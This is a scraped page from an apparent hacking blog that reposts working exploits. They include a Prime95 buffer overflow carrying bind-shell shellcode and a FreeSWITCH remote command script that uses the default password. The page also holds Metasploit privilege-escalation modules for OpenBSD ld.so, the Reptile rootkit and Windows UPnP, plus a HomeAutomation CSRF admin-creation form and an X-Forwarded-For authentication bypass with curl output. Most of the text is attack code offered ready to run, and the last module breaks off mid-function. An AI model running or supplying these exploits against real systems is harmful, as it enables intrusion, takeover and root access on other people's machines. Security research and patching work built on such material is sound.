# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Date: 2019-12-22
# Vendor Homepage: https://www.mersenne.org
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
# Exploit Author: Achilles
# Tested Version: 29.8 build 6
# Tested on: Windows 7 x64
# 1.- Run python code:Prime95.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open Prime95.exe go to PrimeNet
# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
# 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host"
# 6.- Press ok Twice and you will have a bind shell port 3110
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer =3D "\x41" * 660
nseh =3D "\xeb\x06\x90\x90" #jmp short 6
seh =3D struct.pack('<L',0x6ee410b1) #libhwloc-15.dll
nops =3D "\x90" * 20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")
payload =3D buffer + nseh + seh + nops + shellcode
try:
Dopen("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863595279
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenBSD Dynamic Loader chpass Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the OpenBSD `ld.so`
dynamic loader (CVE-2019-19726).
The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
environment variable when set with approximately `ARG_MAX` colons.
This can be abused to load `libutil.so` from an untrusted path,
using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
executable, resulting in privileged code execution.
This module has been tested successfully on:
OpenBSD 6.1 (amd64); and
OpenBSD 6.6 (amd64)
},
'License' => MSF_LICENSE,
'Author' =>
[
'Qualys', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2019-12-11',
'Platform' => %w[bsd unix], # OpenBSD
'Arch' => [ARCH_CMD],
'SessionTypes' => ['shell'],
'References' =>
[
['CVE', '2019-19726'],
['EDB', '47780'],
['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'],
['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'],
['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'],
['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'],
['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig']
],
'Targets' => [['Automatic', {}]],
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse',
'WfsDelay' => 10
},
'DefaultTarget' => 0))
register_options [
OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def base_dir
datastore['WritableDir'].to_s
end
def chpass_path
datastore['CHPASS_PATH']
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def is_root?
(cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
end
def libutil_name
return unless command_exists? 'readelf'
cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first
end
def check
patches = cmd_exec('syspatch -l').to_s
patch = '013_ldso'
if patches.include? patch
vprint_error "Patch #{patch} has been installed. Target is not vulnerable."
return CheckCode::Safe
end
vprint_good "Patch #{patch} is not present"
unless command_exists? 'cc'
vprint_error 'cc is not installed'
return CheckCode::Safe
end
print_good 'cc is installed'
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9
lib_data = <<-EOF
#include <paths.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
if (setuid(0) != 0) _exit(__LINE__);
if (setgid(0) != 0) _exit(__LINE__);
char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF
libs = []
lib = libutil_name
if lib
libs << lib
print_good "Found libutil.so name: #{lib}"
else
libs << 'libutil.so.12.1'
libs << 'libutil.so.13.1'
print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}"
end
lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c"
upload lib_src_path, lib_data
libs.each do |lib_name|
lib_path = "#{base_dir}/#{lib_name}"
print_status "Compiling #{lib_path} ..."
output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall"
register_file_for_cleanup lib_path
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{lib_path}.c failed to compile"
end
end
# Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9
exploit_data = <<-EOF
#include <string.h>
#include <sys/param.h>
#include <sys/resource.h>
#include <unistd.h>
int
main(int argc, char * const * argv)
{
#define LLP "LD_LIBRARY_PATH=."
static char llp[ARG_MAX - 128];
memset(llp, ':', sizeof(llp)-1);
memcpy(llp, LLP, sizeof(LLP)-1);
char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
#define DATA (ARG_MAX * sizeof(char *))
const struct rlimit data = { DATA, DATA };
if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
if (argc <= 1) _exit(__LINE__);
argv += 1;
execve(argv[0], argv, envp);
_exit(__LINE__);
}
EOF
exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
upload "#{exploit_path}.c", exploit_data
print_status "Compiling #{exploit_path} ..."
output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall"
register_file_for_cleanup exploit_path
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
end
payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
upload payload_path, "#!/bin/sh\n#{payload.encoded}\n"
chmod payload_path
print_status 'Launching exploit...'
output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}")
output.each_line { |line| vprint_status line.chomp }
end
end
# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5558
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
HomeAutomation v3.3.2 CSRF Add Admin Exploit
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5558
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php
06.11.2019
--
<html>
<body>
<form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
<input type="hidden" name="id" value="-1" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="editable" value="2" />
<input type="hidden" name="username" value="testingus" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="firstname" value="Tester" />
<input type="hidden" name="lastname" value="Testovski" />
<input type="hidden" name="email" value="test@zeroscience.mk" />
<input type="hidden" name="userlevel" value="3" />
<input type="hidden" name="save" value="Save" />
<input type="submit" value="Addmoi" />
</form>
</body>
</html>
# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5557
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
HomeAutomation v3.3.2 Authentication Bypass Exploit
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application suffers from an authentication bypass vulnerability when
spoofing client IP address using the X-Forwarded-For header with the local (loopback)
IP address value allowing remote control of the smart home solution.
===============================================================================
/modules/login/login.module.php:
--------------------------------
19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
20:
21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
22: {
23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
24: $action = "login";
25: }
26:
27: ?>
===============================================================================
/functions.php:
---------------
733: function isIpLocal() {
734:
735: if(substr(getIpAddress(), 0, 4) == "127.") {
736: return true;
737: }
738:
739: $isIpLocal = false;
740:
741: $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
742:
743: $localnets = explode(";", $localip);
744: foreach($localnets as $localnet) {
745: list($localnet, $localmask) = explode("/", $localnet);
746: if($localmask == "") {
747: $localmask = 32;
748: }
749: if($localmask == "" || $localmask > 32 || $localmask < 0) {
750: $localmask = 32;
751: }
752:
753: // $mask = $localmask;
754:
755: $localnet = ip2long($localnet);
756: $localmask = ~((1 << (32-$localmask)) - 1);
757: $remoteip = ip2long(getIpAddress());
758: $maskedip = $remoteip & $localmask;
759: $maskednet = $localnet & $localmask;
760:
761: // echo "<br />localnet:";
762: // printf('%1$32b', $localnet);
763:
764: // echo "<br />localmask: (dec: ".$mask.")";
765: // printf('%1$32b', $localmask);
766:
767: // echo "<br />remoteip:";
768: // printf('%1$32b', $remoteip);
769:
770: // echo "<br />maskedip:";
771: // printf('%1$32b', $maskedip);
772:
773: // echo "<br />maskednet:";
774: // printf('%1$32b', $maskednet);
775:
776: if($maskedip == $maskednet) {
777: // echo "<br />maskedip == maskednet";
778: $isIpLocal = true;
779: break;
780: }
781: }
782: // $isIpLocal = false;
783: return $isIpLocal;
784: }
785:
786: function getIpAddress() {
787: return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
788: }
===============================================================================
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5557
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
06.11.2019
--
PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
------------------------------------------------------------------------
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
* Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification SKIPPED
* server certificate status verification SKIPPED
* common name: n28.nux.se (does not match '192.168.2.113')
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=n28.nux.se
* start date: Mon, 21 Oct 2019 12:18:27 GMT
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 303 See Other
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Location: ./index.php?page=houseplan
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 192.168.2.113 left intact
* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
* Re-using existing connection! (#0) with host 192.168.2.113
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
> GET /index.php?page=houseplan HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
* </li><li>| <a href="./index.php?page=macros">Macros</a>
Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
* Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
* server certificate verification SKIPPED
* server certificate status verification SKIPPED
* common name: n28.nux.se (does not match '192.168.2.113')
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=n28.nux.se
* start date: Mon, 21 Oct 2019 12:18:27 GMT
* expire date: Sun, 19 Jan 2020 12:18:27 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
>
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:25 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
{ [6 bytes data]
</li><li>| <a href="./index.php?page=macros">Macros</a>
* Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation#
PoC auth bypass retrieving valid Cookie:
-----------------------------------------
root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
Your cookie: k4dic6crpr4d4u71tr13gvtmsv
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',
'Description' => %q{
This module uses Reptile rootkit's `reptile_cmd` backdoor executable
to gain root privileges using the `root` command.
This module has been tested successfully with Reptile from `master`
branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'f0rb1dd3n', # Reptile
'bcoles' # Metasploit
],
'DisclosureDate' => '2018-10-29', # Reptile first stable release
'References' =>
[
['URL', 'https://github.com/f0rb1dd3n/Reptile'],
['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0))
register_options [
OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def reptile_cmd_path
datastore['REPTILE_CMD_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
unless executable? reptile_cmd_path
vprint_error "#{reptile_cmd_path} is not executable"
return CheckCode::Safe
end
vprint_good "#{reptile_cmd_path} is executable"
res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
vprint_status "Output: #{res}"
if res.include?('You have no power here!')
vprint_error 'Reptile kernel module is not loaded'
return CheckCode::Safe
end
unless res.include?('root')
vprint_error 'Reptile is not installed'
return CheckCode::Safe
end
vprint_good 'Reptile is installed and loaded'
CheckCode::Vulnerable
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 8..12}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
print_status 'Executing payload...'
res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
vprint_line res
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
'Description' => %q(
This exploit uses two vulnerabilities to execute a command as an elevated user.
The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
NT AUTHORITY\LOCAL SERVICE
The second (CVE-2019-1322) leverages the Update Orchestrator Service to
elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
),
'License' => MSF_LICENSE,
'Author' =>
[
'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)
'hoangprod', # PoC
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 12 2019',
'References' =>
[
['CVE', '2019-1322'],
['CVE', '2019-1405'],
['EDB', '47684'],
['URL', 'https://github.com/apt69/COMahawk'],
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
}
))
register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('WRITABLE_DIR',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXPLOIT_TIMEOUT',
[true, 'The number of seconds to wait for exploit to finish running', 60]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end
def exploit
exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
payload_path = "#{temp_path}\\#{payload_name}"
exploit_path = "#{temp_path}\\#{exploit_name}"
payload_exe = generate_payload_exe
# Check target
vprint_status("Checking Target")
validate_active_host
validate_target
fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
# Upload Exploit
vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
ensure_clean_destination(exploit_path)
exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
write_file(exploit_path, exploit_bin)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
# Upload Payload
vprint_status("Uploading Payload")
ensure_clean_destination(payload_path)
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
# Run Exploit
vprint_status("Running Exploit")
print_status("It may take a moment after the session is established for the exploit to exit safely.")
begin
cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
rescue Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Caught timeout. Exploit may be taking longer or it may have failed.")
end
vprint_status("Cleaning up #{exploit_path}")
ensure_clean_destination(exploit_path)
end
def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
sysinfo_value = sysinfo['OS']
